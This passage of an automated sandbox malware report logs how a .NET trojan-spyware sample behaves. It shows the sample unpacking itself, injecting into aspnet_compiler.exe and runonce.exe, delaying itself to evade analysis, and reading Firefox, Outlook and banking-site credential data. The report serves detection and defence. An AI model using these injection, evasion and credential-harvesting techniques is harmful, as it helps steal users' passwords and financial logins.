                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_043EE7FC7_2_043EE7FC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_043ED8C87_2_043ED8C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0175B970 appears 277 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017B7E54 appears 111 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017EF290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017DEA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017A5130 appears 58 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 04605130 appears 58 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 0464F290 appears 105 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 04617E54 appears 111 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 045BB970 appears 277 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 0463EA12 appears 86 times
                Source: uI1A364y2P.exe, 00000001.00000002.1403612311.000000000119E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs uI1A364y2P.exe
                Source: uI1A364y2P.exe, 00000001.00000000.1375297221.0000000000B5A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCZXSYYS.exe0 vs uI1A364y2P.exe
                Source: uI1A364y2P.exeBinary or memory string: OriginalFilenameCZXSYYS.exe0 vs uI1A364y2P.exe
                Source: uI1A364y2P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: uI1A364y2P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/2@6/5
                Source: C:\Users\user\Desktop\uI1A364y2P.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uI1A364y2P.exe.logJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\runonce.exeFile created: C:\Users\user~1\AppData\Local\Temp\6511-iOQ--Jump to behavior
                Source: uI1A364y2P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: uI1A364y2P.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: runonce.exe, 00000007.00000003.2094743313.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.2094743313.0000000000779000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2621389939.0000000000779000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2621389939.00000000007AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: uI1A364y2P.exeReversingLabs: Detection: 62%
                Source: uI1A364y2P.exeVirustotal: Detection: 51%
                Source: unknownProcess created: C:\Users\user\Desktop\uI1A364y2P.exe "C:\Users\user\Desktop\uI1A364y2P.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: uI1A364y2P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: uI1A364y2P.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: uI1A364y2P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: CZXSYYS.pdb source: uI1A364y2P.exe
                Source: Binary string: runonce.pdbGCTL source: aspnet_compiler.exe, 00000004.00000002.1896688737.0000000001197000.00000004.00000020.00020000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000003.1881603043.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000004.00000002.1897043771.0000000001730000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1896057355.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.0000000004590000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.000000000472E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1900296225.00000000043E3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.1897043771.0000000001730000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 00000007.00000003.1896057355.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.0000000004590000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.000000000472E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1900296225.00000000043E3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: runonce.pdb source: aspnet_compiler.exe, 00000004.00000002.1896688737.0000000001197000.00000004.00000020.00020000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000003.1881603043.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zk0NoejtsplNyT.exe, 00000006.00000002.2621245081.00000000004FF000.00000002.00000001.01000000.00000008.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2621245434.00000000004FF000.00000002.00000001.01000000.00000008.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: uI1A364y2P.exe, -Module-.cs.Net Code: _206E_202A_202A_200D_200C_206F_200B_200C_200B_200D_206D_202C_202E_202D_200E_200C_202D_200B_202C_202E_200E_206D_200E_206D_200F_206F_200D_202A_200D_200C_206D_202E_206F_200E_206D_206D_206A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: uI1A364y2P.exeStatic PE information: 0xC2A7E558 [Tue Jun 27 09:58:48 2073 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041F04F push ebx; ret 4_2_0041F058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00403280 push eax; ret 4_2_00403282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041AB61 pushfd ; ret 4_2_0041AB78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041ABD6 push ds; ret 4_2_0041ABD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040D38A push edx; iretd 4_2_0040D453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00426CC3 pushad ; iretd 4_2_00426CEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004084DA push esi; retf 4_2_004084DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004084FF push ebp; iretd 4_2_00408502
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00412559 push ecx; iretd 4_2_0041255A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004125DC pushfd ; iretd 4_2_004125FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00405E25 push ecx; ret 4_2_00405E2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00401F0E push ss; retf 4_2_00401F14
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0173225F pushad ; ret 4_2_017327F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017327FA pushad ; ret 4_2_017327F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017609AD push ecx; mov dword ptr [esp], ecx4_2_017609B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0173283D push eax; iretd 4_2_01732858
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EEE3E1 push edx; iretd 6_2_03EEE4AA
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EFBBB8 pushfd ; ret 6_2_03EFBBCF
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF4EB0 push 2C1D344Fh; ret 6_2_03EF4EB7
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EE6E7C push ecx; ret 6_2_03EE6E82
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF3633 pushfd ; iretd 6_2_03EF3652
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF35B0 push ecx; iretd 6_2_03EF35B1
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EE9556 push ebp; iretd 6_2_03EE9559
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF753E push eax; ret 6_2_03EF754A
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EE9531 push esi; retf 6_2_03EE9534
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EFBC2D push ds; ret 6_2_03EFBC2F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045C09AD push ecx; mov dword ptr [esp], ecx7_2_045C09B6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00352BA2 push ecx; ret 7_2_00352BA8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035527C push ebp; iretd 7_2_0035527F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00355257 push esi; retf 7_2_0035525A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035F2D6 push ecx; iretd 7_2_0035F2D7
                Source: uI1A364y2P.exeStatic PE information: section name: .text entropy: 7.873691427098965
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 1170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 54A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 64A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 65D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 75D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 7930000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 8930000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory allocated: 9930000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A096E rdtsc 4_2_017A096E
                Source: C:\Users\user\Desktop\uI1A364y2P.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 4460Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 5512Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\runonce.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\uI1A364y2P.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8064Thread sleep count: 4460 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8064Thread sleep time: -8920000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8064Thread sleep count: 5512 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8064Thread sleep time: -11024000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe TID: 8084Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0036C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_0036C8D0
                Source: C:\Users\user\Desktop\uI1A364y2P.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 6511-iOQ--.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 6511-iOQ--.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 6511-iOQ--.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: active Brokers - COM.HKVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e365.comVMware20,11696492231t
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 6511-iOQ--.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 6511-iOQ--.7.drBinary or memory string: discord.comVMware20,11696492231f
                Source: zk0NoejtsplNyT.exe, 0000000A.00000002.2621634609.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2207962451.000001AE36CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: look.office.comVMware20,P
